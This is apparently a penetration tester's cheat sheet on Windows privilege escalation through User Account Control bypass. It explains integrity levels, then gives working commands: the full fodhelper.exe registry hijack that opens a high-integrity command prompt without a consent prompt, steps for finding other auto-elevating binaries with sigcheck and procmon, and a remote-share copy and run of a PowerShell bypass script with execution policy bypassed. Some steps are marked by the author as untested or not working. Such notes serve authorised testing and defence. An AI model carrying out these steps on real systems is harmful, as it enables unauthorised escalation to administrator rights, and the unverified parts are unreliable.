Privilege escalation techniques on Windows by bypassing User Account Control (UAC).
Windows generates an access token that describes the security context when a user successfully logs in. The information in the token includes the identity and privileges of the user account associated with the process or thread. Tokens have a unique security identifier (SID). SIDs are managed by the Windows Local Security Authority.
Windows integrity mechanism restricts the access permissions of applications that are running under the same user account and that are less trustworthy using integrity levels.
- 0x0000, Untrusted level
- 0x1000 (S-1-16-4096), Low integrity level, restricted rights (sandboxed processes)
- 0x2000 (S-1-16-8192), Medium integrity level, standard user rights
- 0x3000 (S-1-16-12288), High integrity level, administrative rights
- 0x4000 (S-1-16-16384), System integrity level, system rights
UAC Bypass techniques target specific OS versions.
See PowerUp.
Current user integrity level
whoami /groups
Check UAC
If EnableLUA is 0x1, it means that UAC is enabled.
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Open command prompt with high integrity level
powershell.exe Start-Process cmd.exe -Verb runAs
Manual Bypass – Full File System Access (read/write)
Not working…
net use Z: \\\c$
cd c$
Working 🙂
dir \\\c$\Users\Administrator\Desktop
Manual Bypass
Search exploits on the specific OS version. See what process seems vulnerable.
Inspect application manifest
Use sigcheck from SysInternals. -a: extended information, -m: manifest
sigcheck.exe -accepteula -a -m C:\Windows\System32\<vulnerable process>
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i admin
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i elevate
Look for:
<requestedExecutionLevel level="requireAdministrator" />
Inspect Process
Use procmon from SysInternals.
procmon.exe -accepteula
Set Filter to:
Process Name | is | <vulnerable process> |
Operation | contains | Reg |
Result | is | NAME NOT FOUND |
Path | contains | HKCU |
Add the registry key. See fodhelper example.
Bypass UAC with fodhelper.exe
fodhelper.exe runs with high integrity level on Windows 10. It uses registry keys that can be modified without administrative privileges.
Elevate integrity level from Medium to High
Affected versions: Windows 10 1709, Windows 10.0.15063 (WHEN WAS IT FIXED?)
Need to be logged as an administrator. fodhelper runs as administrator and autoelevate (no consent prompt).
List registry (recursively)
reg query HKCU\Software\Classes\ms-settings\Shell\Open /s
Add the missing registry
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
Assign an executable in the registry key
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
Start fodhelper and a command prompt with High integrity will open without a consent prompt.
Using exploit
Not tested, but Metasploit module is based on this.
copy \\x.x.x.x\myshare\FodhelperBypass.ps1 FodhelperBypass.ps1
powershell -exec bypass
Import-Module .\FodhelperBypass.ps1
FodhelperBypass -program "cmd.exe"